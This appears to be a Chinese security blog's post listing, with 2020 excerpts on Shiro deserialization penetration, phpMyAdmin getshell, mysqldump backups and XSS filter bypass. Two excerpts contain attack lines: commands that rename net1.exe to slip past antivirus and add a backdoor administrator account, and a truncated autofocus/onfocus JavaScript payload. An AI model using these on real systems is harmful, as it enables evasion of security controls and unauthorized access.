0X00 前言
@Adminxe 这是主要是利用shiro反序列化漏洞的一次渗透利用,可能有些地方不是很详细,主要还是分享过程
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。未经授权,请勿随便转载!
0x01 渗透过程
前期...
Adminxe
5年前 (2020-03-14) 7485℃ 1评论
19喜欢
0x00 前言
简单总结下phpmyadmin的gestshell的姿势,总结但不拓展(百度是最好的老师,有时间必定会详细写出利用姿势的方法),建议getshell之前,查看用户权限以及phpmyadmin的版本,方便对于漏洞的利用。
0x01 getshe...
Adminxe
5年前 (2020-03-10) 9933℃ 0评论
12喜欢
Bypass 某绒拦截添加用户:
copy c:\windows\system32\net1.exe aaa.txt
aaa.txt user mumu 123.com /add
aaa.txt localgroup Administrators mumu ...
Adminxe
5年前 (2020-03-10) 698℃ 0评论
0喜欢
一、备份单个数据库
1、备份命令:mysqldump
MySQL数据库自带的一个很好用的备份命令。是逻辑备份,导出 的是SQL语句。也就是把数据从MySQL库中以逻辑的SQL语句的形式直接输出或生成备份的文件的过程。
单实例语法(Syntax):
...
Adminxe
5年前 (2020-03-09) 2114℃ 0评论
8喜欢
1.过滤了<>尖括号:
原理:利用html以及js伪协议,当用户打开页面缓冲页面会自动获取焦点,从而触发js代码生成script标签,达到目的。
autofocus οnfοcus=location=”javasCript:s=doc...
Adminxe
5年前 (2020-03-09) 6286℃ 0评论
10喜欢